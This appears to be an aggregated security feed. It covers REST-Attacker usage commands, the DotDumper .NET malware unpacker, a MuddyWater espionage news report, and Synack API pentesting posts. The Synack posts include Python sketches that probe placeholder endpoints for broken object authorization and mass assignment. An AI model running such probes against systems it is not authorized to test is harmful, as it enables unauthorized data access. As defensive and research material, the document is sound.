Test run with only selected test cases (here, scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters
Rerun a test run from a report:
python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json
Documentation
Usage guides and configuration format documentation can be found in the documentation subfolders.
Troubleshooting
For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.
Contributing
Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code amendments via a pull request.
Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.
License
This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.
DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files
An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.
The automatic detection and classification of any given file in a reliable manner is often considered the holy grail of malware analysis. The trials and tribulations to get there are plenty, which is why the creation of such a system is held in high regard. When it comes to DotNet targeting binaries, our new open-source tool DotDumper aims to assist in several of the crucial steps along the way: logging (in-memory) activity, dumping interesting memory segments, and extracting characteristics from the given sample.
Why DotDumper?
In brief, manual unpacking is a tedious process that consumes a disproportionate amount of analysts' time. Obfuscated binaries further increase the time an analyst must spend to unpack a given file. When scaling this up, organizations need numerous analysts who dissect malware daily, likely in combination with a scalable sandbox. That lost time would be better spent digging into interesting campaigns or samples to uncover new threats, rather than the mundane generic malware that is widely spread. After all, analysts look for the few needles in the haystack.
So, what difference does DotDumper make? Running a DotNet based malware sample via DotDumper provides log files of crucial, contextualizing, and common function calls in three formats (human readable plaintext, JSON, and XML), as well as copies from useful in-memory segments. As such, an analyst can skim through the function call log. Additionally, the dumped files can be scanned to classify them, providing additional insight into the malware sample and the data it contains. This cuts down on time vital to the triage and incident response processes, and frees up SOC analyst and researcher time for more sophisticated analysis needs.
Features
To log and dump the contextualizing function calls and their results, DotDumper uses a mixture of reflection and managed hooks, all written in pure C#. Below, key features will be highlighted and elaborated upon, in combination with excerpts of DotDumper’s results of a packed AgentTesla stealer sample, the hashes of which are below.
| Hash type | Hash value |
|---|---|
| SHA-256 | b7512e6b8e9517024afdecc9e97121319e7dad2539eb21a79428257401e5558d |
| SHA-1 | c10e48ee1f802f730f41f3d11ae9d7bcc649080c |
| MD5 | 23541daadb154f1f59119952e7232d6b |
Using the command-line interface
DotDumper is accessible through a command-line interface, with a variety of arguments. The image below shows the help menu. Note that not all arguments will be discussed, but rather the most used ones.
The minimal requirement to run a given sample, is to provide the “-file” argument, along with a file name or file path. If a full path is given, it is used. If a file name is given, the current working directory is checked, as well as the folder of DotDumper’s executable location.
Unless a directory name is provided, the “-log” folder name is set equal to the file name of the sample without the extension (if any). The folder is created in the same directory DotDumper resides in, and this is where the logs and dumped files are saved.
In the case of a library, or an alternative entry point into a binary, one must override the entry point using “-overrideEntry true”. Additionally, one has to provide the fully qualified class, which includes the name space using “-fqcn My.NameSpace.MyClass”. This tells DotDumper which class to select, which is where the provided function name (using “-functionName MyFunction”) is retrieved.
If the selected function requires arguments, one has to provide the number of arguments using “-argc” and the number of required arguments. The argument types and values are to be provided as “string|myValue int|9”. Note that when spaces are used in the values, the argument on the command-line interface needs to be encapsulated between quotes to ensure it is passed as a single argument.
Other less frequently used options such as “-raceTime” or “-deprecated” are safe in their default settings but might require tweaking in the future due to changes in the DotNet Framework. They are currently exposed in the command-line interface to easily allow changes, if need be, even if one is using an older version of DotDumper when the time comes.
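Putting the arguments together, a hypothetical invocation could look like this (the binary name, sample, class, function, and argument values are illustrative; the exact argument-passing syntax is assumed from the description above):

DotDumper.exe -file sample.exe -overrideEntry true -fqcn My.NameSpace.MyClass -functionName MyFunction -argc 2 string|myValue int|9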
Logging and dumping
Logging and dumping are the two core features of DotDumper. To minimize the amount of time the analysis takes, the logging should provide context to the analyst. This is done by providing the analyst with the following information for each logged function call:
- A stack trace based on the function’s caller
- Information regarding the assembly object where the call originated from, such as the name, version, and cryptographic hashes
- The parent assembly, from which the call originates if it is not the original sample
- The type, name, and value of the function’s arguments
- The type, name, and value of the function’s return value, if any
- A list of files which are dumped to disk which correspond with the given function call
Note that for each dumped file, the file name is equal to the file’s SHA-256 hash.
To clarify the above, an excerpt of a log is given below. The excerpt shows the details for the aforementioned AgentTesla sample, where it loads the second stage using DotNet’s Assembly.Load function.
First, the local system time is given, together with the original function’s return type, name, and argument(s). Second, the stack trace is given, where it shows that the sample’s main function leads to a constructor, initialises the components, and calls two custom functions. The Assembly.Load function was called from within “NavigationLib.TaskEightBestOil.GGGGGGGGGGGGGGGGGGGG(String str)”. This provides context for the analyst to find the code around this call if it is of interest.
Then, information regarding the assembly call order is given. The more stages are loaded, the more complex it becomes to see via which stages the call came to be. One normally expects one stage to load the next, but in some cases later stages utilize previous stages in a non-linear order. Additionally, information regarding the originating assembly is given to further enrich the data for the analyst.
Next, the parent hash is given. The parent of a stage is the previous stage, which in this example is not yet present. The newly loaded stage will have this stage as its parent. This allows the analyst to correlate events more easily.
Finally, the function’s return type and value are stored, along with the type, name, and value of each argument that is passed to the hooked function. If any variable is larger than 100 bytes in size, it is stored on the disk instead. A reference is then inserted in the log to reference the file, rather than showing the value. The threshold has been set to avoid hiccups in the printing of the log, as some arrays are thousands of indices in size.
Reflection
Per Microsoft’s documentation, reflection is best summarized as “[…] provides objects that encapsulate assemblies, modules, and types”. In short, this allows the dynamic creation and invocation of DotNet classes and functions from the malware sample. DotDumper contains a reflective loader which allows an analyst to load and analyze both executables and libraries, as long as they are DotNet Framework based.
To utilize the loader, one has to opt to overwrite the entry point in the command-line interface, specify the class (including the namespace it resides in) and function name within a given file. Optionally, one can provide arguments to the specified function, for all native types and arrays thereof. Examples of native types are int, string, char, and arrays such as int[], string[], and char[]. All the arguments are to be provided via the command-line interface, where both the type and the value are to be specified.
Not overriding the entry point results in the default entry point being used. By default, an empty string array is passed towards the sample’s main function, as if the sample is executed without arguments. Additionally, reflection is often used by loaders to invoke a given function in a given class in the next stage. Sometimes, arguments are passed along as well, which are used later to decrypt a resource. In the aforementioned AgentTesla sample, this exact scenario plays out. DotDumper’s invoke related hooks log these occurrences, as can be seen below.
The function name in the first line is not an internal function of the DotNet Framework, but rather a call to a specific function in the second stage. The types and names of the three arguments are listed in the function signature. Their values can be found in the function argument information section. This would allow an analyst to load the second stage in a custom loader with the given values for the arguments, or even do this using DotDumper by loading the previously dumped stage and providing the arguments.
Managed hooks
Before going into managed hooks, one needs to understand how hooks work. There are two main variables to consider here: the target function and a controlled function referred to as the hook. Simply put, the memory at the target function (i.e. Assembly.Load) is altered to instead jump to the hook, diverting the program’s execution flow. The hook can then perform arbitrary actions, optionally call the original function, and return execution to the caller together with a return value if need be. The diagram below illustrates this process.
Knowing what hooks are is essential to understand what managed hooks are. Managed code is executed in a virtual and managed environment, such as the DotNet runtime or Java’s virtual machine. Obtaining the memory address where the managed function resides differs from an unmanaged language such as C. Once the correct memory addresses for both functions have been obtained, the hook can be set by directly accessing memory using unsafe C#, along with DotNet’s interoperability service to call native Windows API functionality.
Easily extendible
Since DotDumper is written in pure C# without any external dependencies, one can easily extend the framework using Visual Studio. The code is documented in this blog, on GitHub, and in classes, in functions, and in-line in the source code. This, in combination with the clear naming scheme, allows anyone to modify the tool as they see fit, minimizing the time and effort that one needs to spend to understand the tool. Instead, it allows developers and analysts alike to focus their efforts on the tool’s improvement.
Differences with known tooling
With the goal and features of DotDumper clear, it might seem as if there’s overlap with known publicly available tools such as ILSpy, dnSpyEx, de4dot, or pe-sieve. Note that there is no intention to proclaim one tool is better than another, but rather how the tools differ.
DotDumper’s goal is to log and dump crucial, contextualizing, and common function calls from DotNet targeting samples. ILSpy is a DotNet disassembler and decompiler, but does not allow the execution of the file. dnSpyEx (and its predecessor dnSpy) utilise ILSpy as the disassembler and decompiler component, while adding a debugger. This allows one to manually inspect and manipulate memory. de4dot is solely used to deobfuscate DotNet binaries, improving the code’s readability for human eyes. The last tool in this comparison, pe-sieve, is meant to detect and dump malware from running processes, disregarding the used programming language. The table below provides a graphical overview of the above-mentioned tools.
Future work
DotDumper is under constant review and development, all of which is focused on two main areas of interest: bug fixing and the addition of new features. During the development, the code was tested, but due to injection of hooks into the DotNet Framework’s functions which can be subject to change, it’s very well possible that there are bugs in the code. Anyone who encounters a bug is urged to open an issue on the GitHub repository, which will then be looked at. The suggestion of new features is also possible via the GitHub repository. For those with a GitHub account, or for those who rather not publicly interact, feel free to send me a private message on my Twitter.
Needless to say, if you've used DotDumper during an analysis, or used it in a creative way, feel free to reach out in public or in private! There’s nothing like hearing about the usage of a home-made tool!
There is more in store for DotDumper, and an update will be sent out to the community once it is available!
Iranian Hackers are Using New Spying Malware to Abuse Telegram Messenger API
In November 2021, a threat actor with an Iranian nexus was discovered to have deployed two new targeted malware families with “simple” backdoor functionality as part of an intrusion into an unnamed government body in the Middle East.
Cybersecurity firm Mandiant attributed the attack to an uncategorized cluster it tracks as UNC3313, which it associates with “moderate certainty” with the state-sponsored group MuddyWater.
“UNC3313 monitors and collects strategic information to support Iranian interests and decision-making,” said researchers Ryan Tomczyk, Emiel Hegebarth and Tufail Ahmed. “The targeting patterns and associated lures show a strong focus on targets with a geopolitical connection.”
In mid-January 2022, MuddyWater (aka Static Kitten, Seedworm, TEMP.Zagros or Mercury) was characterized by U.S. intelligence agencies as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS) that has been active since at least 2018 and is known to use a wide range of tools and methods in their activities.
The attacks were allegedly orchestrated using spear-phishing messages to gain initial access, followed by the use of offensive security tools and publicly available remote access software to move laterally and maintain access to the environment.
The phishing emails used a job-promotion lure and tricked several victims into clicking a URL to download a RAR archive file hosted on OneHub, paving the way for the installation of ScreenConnect, a legitimate remote access software, to gain a foothold.
“UNC3313 quickly established remote access using ScreenConnect to infiltrate systems within an hour of the initial compromise,” the researchers noted, adding that the security incident was quickly contained and resolved.
Subsequent stages of the attack included privilege escalation, performing internal reconnaissance on the target network, and executing obfuscated PowerShell commands to download additional tools and payloads to remote systems.
A previously undocumented backdoor called STARWHALE, a Windows script file (.WSF) that executes commands received from a hard-coded command and control (C2) server via HTTP, was also discovered.
The other implant delivered in the attack is GRAMDOOR, so named because it uses the Telegram API for its network communication with an attacker-controlled server in an attempt to avoid detection, further emphasizing the use of communication tools to facilitate data theft.
The findings also align with a new joint advisory from the UK and US cybersecurity agencies that accuses the MuddyWater group of espionage attacks targeting defense, local government, the oil and gas sector, and telecommunications around the world.
The post Iranian Hackers are Using New Spying Malware to Abuse Telegram Messenger API appeared first on OFFICIAL HACKER.
New functionality added to the Detectify API
The post New functionality added to the Detectify API appeared first on Detectify Blog.
Detectify releases API v2.5
The post Detectify releases API v2.5 appeared first on Detectify Blog.
Introducing Detectify API v 2
The post Introducing Detectify API v 2 appeared first on Detectify Blog.
Newly Added Security Tests, February 3, 2017: WordPress plugins and Elastic search
The post Newly Added Security Tests, February 3, 2017: WordPress plugins and Elastic search appeared first on Detectify Blog.
Don’t Let API Penetration Testing Fall Through the Cracks
API (application programming interface) cybersecurity isn’t as thorough as it needs to be. When it comes to pentesting, web APIs are often lumped in with web applications, despite 90% of web applications having a larger attack surface exposed via APIs than user interfaces, according to Gartner. However, that kind of testing doesn’t cover the full spectrum of APIs, potentially leaving vulnerabilities undiscovered. As APIs become both increasingly important and increasingly vulnerable, it’s more important than ever to keep your APIs secure.
APIs vs. Web Applications
APIs are how software programs talk to each other: interfaces that allow one program to transmit data to another. Integrating applications via APIs allows one piece of software to access and use the capabilities of another. In today’s increasingly connected digital world, it’s no surprise that APIs are becoming more and more prevalent.
When most people think of APIs, what they’re really thinking about are APIs exposed via a web application UI, usually by means of an HTTP-based web server. A web application is any application program that is stored remotely and delivered via the internet through a browser interface.
APIs, however, connect and power everything from mobile applications, to cloud-based services, to internal applications, partner platforms and more. An organization’s APIs may be more numerous than those that can be enumerated through browsing a web application.
Differences in Pentesting
Frequently, organizations that perform pentesting on their web applications assume that a clean bill of health for web applications means that their APIs are just as secure. Unfortunately, that isn’t the case. An effective API security testing strategy requires understanding the differences between web application testing and API security testing.
Web application security mostly focuses on threats like injection attacks, cross-site scripting and buffer overflows. Meanwhile, API breaches typically occur through issues with authorization and authentication, which lets cyber attackers get access to business logic or data.
Web application pentesting isn’t sufficient for testing APIs. Web application testing usually only covers the API calls made by the application, though APIs have a much broader range of functioning than that.
To begin a web application pentest, you provide your pentesters with a list of URLs, and they test all of the fields associated with those URLs. Some of these fields will have APIs behind them, allowing them to communicate with something. If the pentesters find a vulnerability here, that’s an API vulnerability – and that kind of API vulnerability will be caught. However, any APIs that aren’t connected to a field won’t be tested.
Most organizations have more APIs than just the ones attached to web application fields. Any time an application needs to talk to another application or to a database, that’s an API that might still be vulnerable. While a web application pentest won’t be able to test these APIs, an API pentest will.
The Importance of API Pentesting
Unlike web applications, APIs expose endpoints directly, and attackers can manipulate the data those endpoints accept. It’s therefore important to make sure your APIs are tested just as thoroughly as your web applications. By performing separate pentests for APIs and web applications, you make sure your attack surface is fully covered.
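As a concrete illustration of manipulating the data an endpoint accepts, consider a mass-assignment probe, a classic OWASP API Top 10 issue. This is a hedged sketch in Python; the endpoint, fields, and token are hypothetical assumptions, not any particular vendor’s API:

```python
# Hedged sketch of a mass-assignment probe against a hypothetical endpoint.
# The UI may only let users edit "display_name", but the API behind it
# might silently accept fields the UI never sends, such as "role".
import requests

BASE = "https://api.example.com/v1"                     # hypothetical base URL
HEADERS = {"Authorization": "Bearer <low-priv-token>"}  # hypothetical token

payload = {"display_name": "alice", "role": "admin"}    # extra field injected
requests.patch(f"{BASE}/users/me", json=payload, headers=HEADERS, timeout=10)

profile = requests.get(f"{BASE}/users/me", headers=HEADERS, timeout=10).json()
if profile.get("role") == "admin":
    print("Mass assignment: the server accepted a privilege field from the client")
```

A pentest driven only through the UI would never send that extra field, which is exactly why direct API testing matters.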
Synack can help. To learn more about the importance of pentesting for APIs, read this white paper and visit our API security solution page.
Minimize Noise With Human-Led API Pentesting
Last week, we released a new API Pentesting product that allows you to test your headless API endpoints through the Synack Platform. Before the release, we had already conducted more than 100 headless API pentests by customer request, indicating a growing need. This new capability provides an opportunity to get human-led testing and proof-of-coverage on this critical and sprawling part of the attack surface.
Testing APIs Through Web Applications Versus Headless Testing
For years, Synack has found exploitable API vulnerabilities through web applications. However, as Gartner notes, 90% of web applications now have a larger attack surface exposed via APIs than through the user interface. Performing web app pentests is no longer adequate for securing the API attack surface, hence the need for the new headless API pentest from Synack.
Our API pentesting product allows you to activate researchers from the Synack Red Team (SRT) to pentest your API endpoints, headless or otherwise. These researchers have proven API testing skills and will provide thorough testing coverage with less noise than automated solutions.
The Synack Difference: Human-led Coverage and Results
Automated API scanners and testing solutions can produce many false positives and a lot of noise. With our human-led pentesting, we leverage the creativity and diverse perspectives of global researchers to provide meaningful testing coverage and find the vulnerabilities that matter. SRT researchers are compensated for completing each check and are also paid for any exploitable vulnerability findings, ensuring a thorough, incentive-driven test.
Additionally, each submitted vulnerability is vetted by an in-house team called Vulnerability Operations. This reduces noise and prevents teams from wasting time on false positives.
Write-ups for the testing done on each endpoint are made available in real time and are also vetted by Vulnerability Operations. The reports can also be easily exported to PDF for convenient sharing with compliance auditors or other audiences.
These reports showcase a level of detail and thoroughness not found in automated solutions. Each API endpoint will be accompanied by descriptions of the attacks attempted, complete with screenshots of the work performed. Check out one of our sample API pentest reports.
Screenshot from exportable PDF report
How It Works
Through the Assessment Creation Wizard (ACW) found within the Synack Platform, you can now upload your API documentation (Postman, OpenAPI Spec 3.0, JSON) and create a new API assessment.
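For context, here is what a minimal piece of such documentation might look like: an OpenAPI 3.0 description of a single hypothetical endpoint, built and serialized to JSON in Python. The path and schema are illustrative assumptions, not a Synack requirement:

```python
# A minimal OpenAPI 3.0 document describing one hypothetical endpoint,
# serialized to the JSON form that spec-driven tools typically ingest.
import json

spec = {
    "openapi": "3.0.0",
    "info": {"title": "Example Orders API", "version": "1.0.0"},
    "paths": {
        "/orders/{orderId}": {
            "get": {
                "summary": "Fetch a single order",
                "parameters": [{
                    "name": "orderId",
                    "in": "path",
                    "required": True,
                    "schema": {"type": "string"},
                }],
                "responses": {"200": {"description": "The requested order"}},
            }
        }
    },
}

print(json.dumps(spec, indent=2))
```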
For each specified endpoint in your API, a “Mission” will be generated and sent out for claiming by SRT members with proven API testing experience. The “Mission” asks the researcher to check the endpoint for vulnerabilities like those listed in the OWASP API Top 10, while recording their efforts with screenshots and detailed write-ups; a sketch of what the first check involves follows the list. Vulnerabilities tested for include:
- Broken Object Level Authorization
- Broken User Authentication
- Excessive Data Exposure
- Broken Function Level Authorization
- Mass Assignment
- Security Misconfiguration
- Injection
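To make the first item concrete: a Broken Object Level Authorization (BOLA) check essentially asks whether user A can read user B’s objects by reusing an ID. Here is a minimal sketch in Python; the endpoint, IDs, and tokens are hypothetical, and a real engagement would use accounts provisioned for the test:

```python
# Hedged sketch of a Broken Object Level Authorization (BOLA) check.
# All URLs and tokens are hypothetical, for illustration only.
import requests

BASE = "https://api.example.com/v1"
USER_A = {"Authorization": "Bearer <user-a-token>"}
USER_B = {"Authorization": "Bearer <user-b-token>"}

# User B creates an object, then user A tries to fetch it by its ID.
created = requests.post(f"{BASE}/invoices", json={"amount": 42},
                        headers=USER_B, timeout=10).json()
invoice_id = created["id"]

resp = requests.get(f"{BASE}/invoices/{invoice_id}", headers=USER_A, timeout=10)
if resp.status_code == 200:
    print("Possible BOLA: user A can read user B's invoice")
else:
    print(f"Access correctly denied (HTTP {resp.status_code})")
```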
Proof-of-coverage reports, as well as exploitable vulnerability findings, are surfaced in real time for each endpoint within the Synack Platform.
Real-time results in platform
Through the Synack Platform, an exploitable vulnerability finding can be quickly viewed in the “Vulnerabilities” tab, which rolls up findings from all of your Synack testing activities. For a given vulnerability, you can comment back and forth with the researcher who submitted the finding, as well as request patch verification to ensure patch efficacy.
Retesting On-demand
As long as you’re on the Synack Platform, you have on-demand access to the Synack Red Team, so previously tested APIs can be retested at the push of a button. Simply use the “retesting” workflow to select the endpoints you want to retest and press submit. This starts a new test on the specified endpoints, sending the work out once more to the SRT and producing fresh proof-of-coverage reports. It’s a powerful way to test after an update to an API or to meet a recurring compliance requirement.
Get Started
Get started today by downloading our API pentesting data sheet.
Synack Expands Security Platform with Adversarial API Pentesting
Synack, the premier security testing platform, has launched an API pentesting capability powered by its global community of elite security researchers. Organizations can now rely on the Synack platform for continuous pentesting coverage across “headless” API endpoints that lack a user interface and are increasingly exposed to attackers.
“Synack’s human-led, adversarial approach is ideal for testing APIs that form the backbone of society’s digital transformation,” said Synack CTO and co-founder Mark Kuhr, a former National Security Agency cybersecurity expert. “We are thrilled to offer customers a unique, scalable way to secure this growing area of their attack surfaces.”
Gartner estimates API abuses will be the most common source of data breaches in enterprise web applications this year. Synack enables organizations to verify that exploitable API vulnerabilities like broken authorization and authentication, noted in the OWASP API Top 10, can’t be abused by malicious hackers.
“Many organizations are struggling to find the top-tier cyber talent needed to root out API-specific vulnerabilities,” said Peter Blanks, Chief Product Officer at Synack. “We’re excited to extend our Synack platform to provide human-powered offensive security testing on APIs.”
Synack’s headless API capability builds on years of API pentesting experience through web and mobile applications. The new platform features allow customers to enter API documentation to guide testing scope and coverage. Next, researchers with the Synack Red Team attempt to exploit API endpoints in the way a real external adversary would.
Of the Synack Red Team’s over 1,500 global members, only those with proven API testing skills are activated on API requests, reducing noise. Synack’s Special Projects division led over 100 successful pentests against headless APIs in 2022, providing customers with critical proof-of-coverage reports while validating researchers’ API expertise.
Vulnerability submissions and testing reports are routed through Synack’s Vulnerability Operations team for a rigorous vetting process before being displayed in the platform, minimizing false positives and ensuring high-quality results.
For more information about Synack’s API security testing, visit our Solutions page.